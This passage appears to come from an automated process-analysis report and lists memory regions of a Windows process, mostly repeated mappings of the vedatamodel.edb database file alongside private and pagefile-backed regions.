"\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1722 start_va = 0xdae5fd0000 end_va = 0xdae5fdffff entry_point = 0xdae5fd0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1723 start_va = 0xdae5fe0000 end_va = 0xdae5fe0fff entry_point = 0x0 region_type = private name = "private_0x000000dae5fe0000" filename = "" Region: id = 1724 start_va = 0xdae5ff0000 end_va = 0xdae5ff0fff entry_point = 0x0 region_type = private name = "private_0x000000dae5ff0000" filename = "" Region: id = 1725 start_va = 0xdae6000000 end_va = 0xdae6000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae6000000" filename = "" Region: id = 1726 start_va = 0xdae6010000 end_va = 0xdae601ffff entry_point = 0xdae6010000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1727 start_va = 0xdae6020000 end_va = 0xdae6027fff entry_point = 0xdae6020000 region_type = mapped_file name = "staterepository-machine.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Machine.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-machine.srd-shm") Region: id = 1728 start_va = 0xdae6030000 end_va = 0xdae6030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae6030000" filename = "" Region: id = 1729 start_va = 0xdae6040000 end_va = 0xdae6040fff entry_point = 0x0 region_type = private name = "private_0x000000dae6040000" filename = "" Region: id = 1730 start_va = 0xdae6050000 end_va = 0xdae6050fff entry_point = 0x0 region_type = private name = "private_0x000000dae6050000" filename = "" Region: id = 1731 start_va = 0xdae6060000 end_va = 0xdae6060fff entry_point = 0x0 region_type = private name = "private_0x000000dae6060000" filename = "" Region: id = 1732 start_va = 0xdae6070000 end_va = 0xdae6070fff entry_point = 0x0 region_type = private name = "private_0x000000dae6070000" filename = "" Region: id = 1733 start_va = 0xdae6080000 end_va = 0xdae6080fff entry_point = 0x0 region_type = private name = "private_0x000000dae6080000" filename = "" Region: id = 1734 start_va = 0xdae6090000 end_va = 0xdae6096fff entry_point = 0x0 region_type = private name = "private_0x000000dae6090000" filename = "" Region: id = 1735 start_va = 0xdae60a0000 end_va = 0xdae60affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae60a0000" filename = "" Region: id = 1736 start_va = 0xdae60b0000 end_va = 0xdae60bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae60b0000" filename = "" Region: id = 1737 start_va = 0xdae60c0000 end_va = 0xdae60cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae60c0000" filename = "" Region: id = 1738 start_va = 0xdae60d0000 end_va = 0xdae60dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae60d0000" filename = "" Region: id = 1739 start_va = 0xdae60e0000 end_va = 0xdae60e3fff entry_point = 0x0 region_type = private name = "private_0x000000dae60e0000" filename = "" Region: id = 1740 start_va = 0xdae60f0000 end_va = 0xdae60f1fff entry_point = 0x0 region_type = private name = "private_0x000000dae60f0000" filename = "" Region: id = 1741 start_va = 0xdae6100000 end_va = 0xdae61fffff entry_point = 0x0 region_type = private name = "private_0x000000dae6100000" filename = "" Region: id = 1742 start_va = 0xdae6200000 end_va = 0xdae6387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae6200000" filename = "" Region: id = 1743 start_va = 0xdae6390000 end_va = 0xdae6390fff entry_point = 0x0 region_type = private name = "private_0x000000dae6390000" filename = "" Region: id = 1744 start_va = 0xdae63a0000 end_va = 0xdae63a0fff entry_point = 0x0 region_type = private name = "private_0x000000dae63a0000" filename = "" Region: id = 1745 start_va = 0xdae63b0000 end_va = 0xdae63bffff entry_point = 0xdae63b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1746 start_va = 0xdae63c0000 end_va = 0xdae63c6fff entry_point = 0x0 region_type = private name = "private_0x000000dae63c0000" filename = "" Region: id = 1747 start_va = 0xdae63d0000 end_va = 0xdae63effff entry_point = 0x0 region_type = private name = "private_0x000000dae63d0000" filename = "" Region: id = 1748 start_va = 0xdae63f0000 end_va = 0xdae63fffff entry_point = 0xdae63f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1749 start_va = 0xdae6400000 end_va = 0xdae64fffff entry_point = 0x0 region_type = private name = "private_0x000000dae6400000" filename = "" Region: id = 1750 start_va = 0xdae6500000 end_va = 0xdae6680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae6500000" filename = "" Region: id = 1751 start_va = 0xdae6690000 end_va = 0xdae674ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae6690000" filename = "" Region: id = 1752 start_va = 0xdae6750000 end_va = 0xdae684ffff entry_point = 0x0 region_type = private name = "private_0x000000dae6750000" filename = "" Region: id = 1753 start_va = 0xdae6850000 end_va = 0xdae694ffff entry_point = 0x0 region_type = private name = "private_0x000000dae6850000" filename = "" Region: id = 1754 start_va = 0xdae6950000 end_va = 0xdae6c86fff entry_point = 0xdae6950000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1755 start_va = 0xdae6e90000 end_va = 0xdae6f8ffff entry_point = 0x0 region_type = private name = "private_0x000000dae6e90000" filename = "" Region: id = 1756 start_va = 0xdae6f90000 end_va = 0xdae708ffff entry_point = 0x0 region_type = private name = "private_0x000000dae6f90000" filename = "" Region: id = 1757 start_va = 0xdae7090000 end_va = 0xdae709ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae7090000" filename = "" Region: id = 1758 start_va = 0xdae70a0000 end_va = 0xdae70affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae70a0000" filename = "" Region: id = 1759 start_va = 0xdae70b0000 end_va = 0xdae70bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae70b0000" filename = "" Region: id = 1760 start_va = 0xdae70c0000 end_va = 0xdae70cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000dae70c0000" filename = "" Region: id = 1761 start_va = 0xdae70d0000 end_va = 0xdae80cffff entry_point = 0x0 region_type = private name = "private_0x000000dae70d0000" filename = "" Region: id = 1762 start_va = 0xdae80d0000 end_va = 0xdaf80cffff entry_point = 0x0 region_type = private name = "private_0x000000dae80d0000" filename = "" Region: id = 1763 start_va = 0xdaf80d0000 end_va = 0xdaf80dffff entry_point = 0xdaf80d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1764 start_va = 0xdaf80e0000 end_va = 0xdaf80effff entry_point = 0xdaf80e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1765 start_va = 0xdaf80f0000 end_va = 0xdaf80fffff entry_point = 0xdaf80f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1766 start_va = 0xdaf8100000 end_va = 0xdaf810ffff entry_point = 0xdaf8100000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1767 start_va = 0xdaf8110000 end_va = 0xdaf811ffff entry_point = 0xdaf8110000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1768 start_va = 0xdaf8120000 end_va = 0xdaf812ffff entry_point = 0xdaf8120000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1769 start_va = 0xdaf8130000 end_va = 0xdaf813ffff entry_point = 0xdaf8130000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1770 start_va = 0xdaf8140000 end_va = 0xdaf814ffff entry_point = 0xdaf8140000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1771 start_va = 0xdaf8150000 end_va = 0xdaf815ffff entry_point = 0xdaf8150000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1772 start_va = 0xdaf8160000 end_va = 0xdaf816ffff entry_point = 0xdaf8160000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1773 start_va = 0xdaf8170000 end_va = 0xdaf817ffff entry_point = 0xdaf8170000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1774 start_va = 0xdaf8180000 end_va = 0xdaf818ffff entry_point = 0xdaf8180000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1775 start_va = 0xdaf8190000 end_va = 0xdaf819ffff entry_point = 0xdaf8190000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1776 start_va = 0xdaf81a0000 end_va = 0xdaf821ffff entry_point = 0x0 region_type = private name = "private_0x000000daf81a0000" filename = "" Region: id = 1777 start_va = 0xdaf8220000 end_va = 0xdaf822ffff entry_point = 0xdaf8220000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1778 start_va = 0xdaf8230000 end_va = 0xdaf8230fff entry_point = 0x0 region_type = private name = "private_0x000000daf8230000" filename = "" Region: id = 1779 start_va = 0xdaf8240000 end_va = 0xdaf824ffff entry_point = 0xdaf8240000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1780 start_va = 0xdaf8250000 end_va = 0xdaf825ffff entry_point = 0xdaf8250000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1781 start_va = 0xdaf8260000 end_va = 0xdaf826ffff entry_point = 0xdaf8260000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1782 start_va = 0xdaf8270000 end_va = 0xdaf827ffff entry_point = 0xdaf8270000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1783 start_va = 0xdaf8280000 end_va = 0xdaf828ffff entry_point = 0xdaf8280000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1784 start_va = 0xdaf8290000 end_va = 0xdaf829ffff entry_point = 0xdaf8290000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1785 start_va = 0xdaf82a0000 end_va = 0xdaf82affff entry_point = 0xdaf82a0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1786 start_va = 0xdaf82b0000 end_va = 0xdaf82bffff entry_point = 0xdaf82b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1787 start_va = 0xdaf82c0000 end_va = 0xdaf82cffff entry_point = 0xdaf82c0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1788 start_va = 0xdaf82d0000 end_va = 0xdaf82dffff entry_point = 0xdaf82d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1789 start_va = 0xdaf82e0000 end_va = 0xdaf82effff entry_point = 0xdaf82e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1790 start_va = 0xdaf82f0000 end_va = 0xdaf82fffff entry_point = 0xdaf82f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1791 start_va = 0xdaf8300000 end_va = 0xdaf830ffff entry_point = 0xdaf8300000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1792 start_va = 0xdaf8310000 end_va = 0xdaf831ffff entry_point = 0xdaf8310000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1793 start_va = 0xdaf8320000 end_va = 0xdaf832ffff entry_point = 0xdaf8320000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1794 start_va = 0xdaf8330000 end_va = 0xdaf833ffff entry_point = 0xdaf8330000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1795 start_va = 0xdaf8340000 end_va = 0xdaf834ffff entry_point = 0xdaf8340000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1796 start_va = 0xdaf8350000 end_va = 0xdaf835ffff entry_point = 0xdaf8350000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1797 start_va = 0xdaf8360000 end_va = 0xdaf836ffff entry_point = 0xdaf8360000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1798 start_va = 0xdaf8370000 end_va = 0xdaf837ffff entry_point = 0xdaf8370000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1799 start_va = 0xdaf8380000 end_va = 0xdaf838ffff entry_point = 0xdaf8380000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1800 start_va = 0xdaf8390000 end_va = 0xdaf83b9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000daf8390000" filename = "" Region: id = 1801 start_va = 0xdaf83c0000 end_va = 0xdaf83cffff entry_point = 0xdaf83c0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1802 start_va = 0xdaf83d0000 end_va = 0xdaf83dffff entry_point = 0xdaf83d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1803 start_va = 0xdaf83e0000 end_va = 0xdaf83effff entry_point = 0xdaf83e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1804 start_va = 0xdaf83f0000 end_va = 0xdaf83fffff entry_point = 0xdaf83f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1805 start_va = 0xdaf8400000 end_va = 0xdaf840ffff entry_point = 0xdaf8400000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1806 start_va = 0xdaf8510000 end_va = 0xdaf851ffff entry_point = 0xdaf8510000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1807 start_va = 0xdaf8520000 end_va = 0xdaf852ffff entry_point = 0xdaf8520000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1808 start_va = 0xdaf8530000 end_va = 0xdaf853ffff entry_point = 0xdaf8530000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1809 start_va = 0xdaf8640000 end_va = 0xdaf873ffff entry_point = 0x0 region_type = private name = "private_0x000000daf8640000" filename = "" Region: id = 1810 start_va = 0xdaf8740000 end_va = 0xdaf874ffff entry_point = 0xdaf8740000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1811 start_va = 0xdaf8750000 end_va = 0xdaf875ffff entry_point = 0xdaf8750000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1812 start_va = 0xdaf8760000 end_va = 0xdaf876ffff entry_point = 0xdaf8760000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1813 start_va = 0xdaf8770000 end_va = 0xdaf877ffff entry_point = 0xdaf8770000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1814 start_va = 0xdaf8780000 end_va = 0xdaf878ffff entry_point = 0xdaf8780000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1815 start_va = 0xdaf8790000 end_va = 0xdaf879ffff entry_point = 0xdaf8790000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1816 start_va = 0xdaf87a0000 end_va = 0xdaf87affff entry_point = 0xdaf87a0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1817 start_va = 0xdaf87b0000 end_va = 0xdaf87bffff entry_point = 0xdaf87b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1818 start_va = 0xdaf87c0000 end_va = 0xdaf87cffff entry_point = 0xdaf87c0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1819 start_va = 0xdaf87d0000 end_va = 0xdaf87dffff entry_point = 0xdaf87d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1820 start_va = 0xdaf87e0000 end_va = 0xdaf87effff entry_point = 0xdaf87e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1821 start_va = 0xdaf87f0000 end_va = 0xdaf87fffff entry_point = 0xdaf87f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1822 start_va = 0xdaf8800000 end_va = 0xdaf88fffff entry_point = 0x0 region_type = private name = "private_0x000000daf8800000" filename = "" Region: id = 1823 start_va = 0xdaf8900000 end_va = 0xdaf890ffff entry_point = 0xdaf8900000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1824 start_va = 0xdaf8910000 end_va = 0xdaf891ffff entry_point = 0xdaf8910000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 1825 start_va = 0xdaf8920000 end_va = 0xdaf892ffff entry_point = 0xdaf8920000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: 